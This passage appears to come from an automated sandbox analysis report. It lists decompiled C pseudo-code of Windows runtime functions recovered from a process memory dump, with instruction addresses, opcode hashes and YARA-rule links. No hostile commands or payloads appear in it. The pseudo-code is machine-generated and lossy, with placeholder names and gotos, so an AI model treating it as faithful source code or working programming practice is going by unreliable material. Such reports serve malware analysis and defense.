								E04DD88F5(_t80, _t85, 0x4df5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4df86c0; // 0xc807b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4df86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04D22280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04DD88F5(0x4df85ec, _t85, 0x4df5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04D4AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4dfb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4df84c0;
																			if(_t82 >=  *0x4df84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04DD9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04D0922A(_t99);
										_t64 = E04D27D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04DD8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4df86c0; // 0xc807b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4df86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4df86bc;
													_t87 = 0x4df86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04D09240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4df86c4;
												_t87 = 0x4df86c0;
												L27:
												E04D39B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04D5D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4df5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4df538c = _t51;
						goto L6;
					}
				}
			}

0x04d09082
0x04d09083
0x04d09084
0x04d09085
0x04d09087
0x04d09096
0x04d09098
0x04d09098
0x04d0909e
0x04d090a8
0x04d090e7
0x04d090e7
0x04d090aa
0x04d090b0
0x04d090b7
0x04d090bd
0x04d090dd
0x04d090e6
0x04d090bf
0x04d090bf
0x04d090c7
0x04d090cf
0x04d090f1
0x04d090f2
0x04d090f4
0x04d090f5
0x04d090f6
0x04d090f7
0x04d090f8
0x04d090f9
0x04d090fa
0x04d090fb
0x04d090fc
0x04d090fd
0x04d090fe
0x04d090ff
0x04d09100
0x04d09102
0x04d09107
0x04d0910c
0x04d09110
0x04d09113
0x04d09115
0x04d09136
0x04d0913f
0x04d09143
0x04d637e4
0x04d637e4
0x04d09117
0x04d09117
0x04d0911d
0x00000000
0x04d0911f
0x04d0911f
0x04d09125
0x00000000
0x04d09127
0x04d0912d
0x04d09130
0x04d09134
0x04d09158
0x04d0915d
0x04d09161
0x04d09168
0x04d63715
0x04d0916e
0x04d0916e
0x04d09175
0x04d09177
0x04d0917e
0x04d0917f
0x04d09182
0x04d09182
0x04d09187
0x04d09187
0x04d0918a
0x04d0918d
0x04d0918f
0x04d09192
0x04d09195
0x04d09198
0x04d09198
0x04d09198
0x04d0919a
0x00000000
0x00000000
0x04d6371f
0x04d63721
0x04d63727
0x04d6372f
0x04d63733
0x04d63735
0x04d63738
0x04d6373b
0x04d6373d
0x04d63740
0x00000000
0x04d63746
0x04d63746
0x04d63749
0x00000000
0x04d6374f
0x04d6374f
0x04d63751
0x04d63757
0x04d63759
0x04d6375c
0x04d6375c
0x04d6375e
0x04d6375e
0x04d63761
0x04d63764
0x00000000
0x00000000
0x04d63766
0x04d63768
0x04d637a3
0x04d637a3
0x04d637a5
0x04d637a7
0x04d637ad
0x04d637b0
0x04d637b2
0x04d637bc
0x04d637c2
0x04d637c2
0x04d637b2
0x04d09187
0x04d09187
0x04d0918a
0x04d0918d
0x04d0918f
0x04d09192
0x04d09195
0x00000000
0x04d09195
0x00000000
0x04d6376a
0x04d6376a
0x04d6376a
0x04d6376c
0x04d6376c
0x04d6376f
0x04d63775
0x00000000
0x00000000
0x04d63777
0x04d63779
0x04d63782
0x04d63787
0x04d63789
0x04d63790
0x04d63790
0x04d6378b
0x04d6378b
0x04d6378b
0x04d63792
0x04d63795
0x00000000
0x04d63795
0x00000000
0x04d63779
0x04d63798
0x00000000
0x04d63798
0x00000000
0x04d63768
0x04d6379b
0x04d6379b
0x04d63751
0x04d63749
0x00000000
0x04d63740
0x04d091a0
0x04d091a3
0x04d091a9
0x04d091b0
0x00000000
0x04d091b0
0x04d09187
0x04d091b4
0x04d091b4
0x04d091bb
0x04d091c0
0x04d091c5
0x04d091c7
0x04d637da
0x04d091cd
0x04d091cd
0x04d091cd
0x04d091d2
0x04d091d5
0x04d09239
0x04d09239
0x04d091d7
0x04d091db
0x04d091e1
0x04d091e7
0x04d091fd
0x04d09203
0x04d0921e
0x04d09223
0x00000000
0x04d09205
0x04d09205
0x04d09208
0x04d0920c
0x04d09214
0x04d09214
0x04d0920c
0x04d091e9
0x04d091e9
0x04d091ee
0x04d091f3
0x04d091f3
0x04d091f3
0x04d091e7
0x00000000
0x00000000
0x00000000
0x04d09134
0x04d09125
0x04d0911d
0x04d0914e
0x04d090d1
0x04d090d1
0x04d090d3
0x04d090d6
0x04d090d8
0x00000000
0x04d090d8
0x04d090cf

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc31b5233ae4efac103129706d9fb8462e3e5ce47e81805038f88adf20fb433
Instruction ID: cdbdcd3f5b46254fd786989f2353fcd4564ee38d4e9d7b381dc1b8022e1c736b
Opcode Fuzzy Hash: fbc31b5233ae4efac103129706d9fb8462e3e5ce47e81805038f88adf20fb433
Instruction Fuzzy Hash: 1001D1B27012009FE7249F18E860B1177F9FB41325F2280A6E6059B792C374FC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04DC14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04DC14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4dfd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04D4FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04D27D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04dc14fb
0x04dc14fb
0x04dc150a
0x04dc1514
0x04dc1519
0x04dc151b
0x04dc1526
0x04dc152c
0x04dc1534
0x04dc1537
0x04dc153a
0x04dc1545
0x04dc1557
0x04dc1547
0x04dc1550
0x04dc1550
0x04dc1562
0x04dc1563
0x04dc1565
0x04dc156a
0x04dc157f

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9463061d8c59a3b4ca3b93754955aece18c854cee028164c279525eb6d267dfc
Instruction ID: 257af120740d8978df470cd245576912cf9df2bcdb7ad6087250b079f721d634
Opcode Fuzzy Hash: 9463061d8c59a3b4ca3b93754955aece18c854cee028164c279525eb6d267dfc
Instruction Fuzzy Hash: 29017571A01258AFDB14DF69D846FAEB7B8EF44714F40405AF915EB381D674EE00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04DC138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04DC138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4dfd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04D4FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04D27D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04dc138a
0x04dc138a
0x04dc1399
0x04dc13a3
0x04dc13a8
0x04dc13aa
0x04dc13b5
0x04dc13bb
0x04dc13c3
0x04dc13c6
0x04dc13c9
0x04dc13d4
0x04dc13e6
0x04dc13d6
0x04dc13df
0x04dc13df
0x04dc13f1
0x04dc13f2
0x04dc13f4
0x04dc13f9
0x04dc140e

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d544322febb4c7f1744d3ef57c8f214ce9b11e83c4a4e569bbb4cfa6da779bc
Instruction ID: 3b960bbed05139c568819830a988cd29e5aeb8ebc47e7475c6101cb099c78cc1
Opcode Fuzzy Hash: 1d544322febb4c7f1744d3ef57c8f214ce9b11e83c4a4e569bbb4cfa6da779bc
Instruction Fuzzy Hash: 77014071A00218ABDB14DFA9D842FAEB7B8EF44714F40405AF945AB281D674EA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04DBFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04DBFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4dfd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04D4FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04dbfec0
0x04dbfec0
0x04dbfecf
0x04dbfed9
0x04dbfede
0x04dbfee0
0x04dbfeeb
0x04dbfef3
0x04dbfef6
0x04dbfef9
0x04dbff04
0x04dbff16
0x04dbff06
0x04dbff0f
0x04dbff0f
0x04dbff21
0x04dbff22
0x04dbff24
0x04dbff29
0x04dbff3e

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b16548f80787f5797a96ab78bf0792e853cb9f9a297150b9c8d3fa478dd1f45
Instruction ID: 4ce3f59f993db97a1f6bd7e71f304b9e9dfc3243221701763ab48830e5dd05ca
Opcode Fuzzy Hash: 0b16548f80787f5797a96ab78bf0792e853cb9f9a297150b9c8d3fa478dd1f45
Instruction Fuzzy Hash: E6018871F00218ABDB14DBA9D845FAFB7B8EF44704F40406AF901EB390D974EA01C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04DD1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04DD1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04DD165E(__ebx, 0x4df8ae4, (__edx -  *0x4df8b04 >> 0x14) + (__edx -  *0x4df8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4df8b04 >> 0x14) + (__edx -  *0x4df8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04DCAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04D27D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04DBFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x04dd1074
0x04dd1080
0x04dd1082
0x04dd108a
0x04dd108f
0x04dd1093
0x04dd10ab
0x04dd10ab
0x04dd10c3
0x04dd10cf
0x04dd10e1
0x04dd10d1
0x04dd10da
0x04dd10da
0x04dd10e9
0x04dd10f5
0x04dd10f5
0x04dd10fe

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ba974baf75511c106cd6ced8db7bea6abdd597762f246f6e82c719d5a7df677
Instruction ID: 6364620134d9e05a9d43894e73967deffff5c3bb5ac14c8286a9f51f22dabdf8
Opcode Fuzzy Hash: 8ba974baf75511c106cd6ced8db7bea6abdd597762f246f6e82c719d5a7df677
Instruction Fuzzy Hash: 0701F1727047429BD721EB68C900B2A77E5FB84318F048629F88683290EE30F840CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04DBFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04DBFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4dfd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04D4FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04dbfe3f
0x04dbfe3f
0x04dbfe4e
0x04dbfe58
0x04dbfe5d
0x04dbfe5f
0x04dbfe6a
0x04dbfe72
0x04dbfe75
0x04dbfe78
0x04dbfe83
0x04dbfe95
0x04dbfe85
0x04dbfe8e
0x04dbfe8e
0x04dbfea0
0x04dbfea1
0x04dbfea3
0x04dbfea8
0x04dbfebd

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9047807f6f873bdd365a50d74fb137033d67c4d362abfb87f8066c60b610bae3
Instruction ID: 73f83171f7abaa4a0ecd33ca18a97588cd07aa2fbb1b9fd7e998ff24d4288757
Opcode Fuzzy Hash: 9047807f6f873bdd365a50d74fb137033d67c4d362abfb87f8066c60b610bae3
Instruction Fuzzy Hash: BD018471F00218ABDB14DFA9D846FAEB7B8EF84704F00406AF901EB391DA74E901C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04D1B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D1B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04D27D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04D87016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x04d1b037
0x04d1b039
0x04d1b03b
0x04d1b040
0x04d6a60e
0x00000000
0x00000000
0x04d6a61d
0x04d1b04b
0x04d1b04e
0x04d6a627
0x04d6a634
0x00000000
0x00000000
0x04d6a641
0x04d6a653
0x04d6a643
0x04d6a64c
0x04d6a64c
0x04d6a65b
0x00000000
0x00000000
0x00000000
0x04d6a66c
0x04d1b057
0x04d1b057
0x04d1b057
0x04d1b046
0x04d1b046
0x00000000

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: af8105e308199fb1e983a7edec3ea668a774f8de8b755e2922bbe9dc7f98ca52
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 20018F32300980EFD322CB5CD988F7677E8FB46754F0900A2F95ACBA61E668FC40C620

Uniqueness

Uniqueness Score: -1.00%

Function 04DD8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04DD8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4dfd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04D27D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x04dd8ed6
0x04dd8ee5
0x04dd8eed
0x04dd8ef0
0x04dd8efa
0x04dd8f03
0x04dd8f0c
0x04dd8f15
0x04dd8f24
0x04dd8f27
0x04dd8f31
0x04dd8f43
0x04dd8f33
0x04dd8f3c
0x04dd8f3c
0x04dd8f4e
0x04dd8f4f
0x04dd8f51
0x04dd8f56
0x04dd8f69

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4b633eb7e8d2a9fd074bf72bfe490db9fd23e45b0b1f35b0b1673a1fbbbf97
Instruction ID: 1738a0b71951048d9361b3299b589367528195e319b646a89166d829126dd7da
Opcode Fuzzy Hash: 6f4b633eb7e8d2a9fd074bf72bfe490db9fd23e45b0b1f35b0b1673a1fbbbf97
Instruction Fuzzy Hash: 04111E70E002199FDB04DFA9D541BAEB7F4FF08304F0442AAE519EB782E634E940DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D0B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D0B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04D27D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04D27D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04D87016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x04d0b1e8
0x04d0b1ea
0x04d0b1f3
0x04d64a17
0x04d0b1f9
0x04d0b1f9
0x04d0b1f9
0x04d0b201
0x04d64a21
0x04d64a2e
0x00000000
0x00000000
0x04d64a3b
0x04d64a4d
0x04d64a3d
0x04d64a46
0x04d64a46
0x04d64a55
0x00000000
0x00000000
0x00000000
0x04d0b20a
0x04d0b20a
0x04d0b20a
0x04d0b20a

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: d5011c76fe037fa4fff02697e5f582e8bdedfa8e376cea3b00df49ea85f6dea6
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 06018132344680EBD32297A9C904F6A7B99FF51758F0940A2F9558B6B2E679F800D229

Uniqueness

Uniqueness Score: -1.00%

Function 04D9FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04D9FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4dfd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04D27D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04d9fe96
0x04d9fe9e
0x04d9fea1
0x04d9fead
0x04d9feb3
0x04d9feb9
0x04d9fec3
0x04d9fed5
0x04d9fec5
0x04d9fece
0x04d9fece
0x04d9fee0
0x04d9fee1
0x04d9fee3
0x04d9fee8
0x04d9fefb

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b3d57549a62481779ced451b1b2b90cab9be3344c4032c3315ac22659914018
Instruction ID: 419e9b3bfc2724417d41db92481fe4e4054199fb68221db7f555fa79878f1a69
Opcode Fuzzy Hash: 3b3d57549a62481779ced451b1b2b90cab9be3344c4032c3315ac22659914018
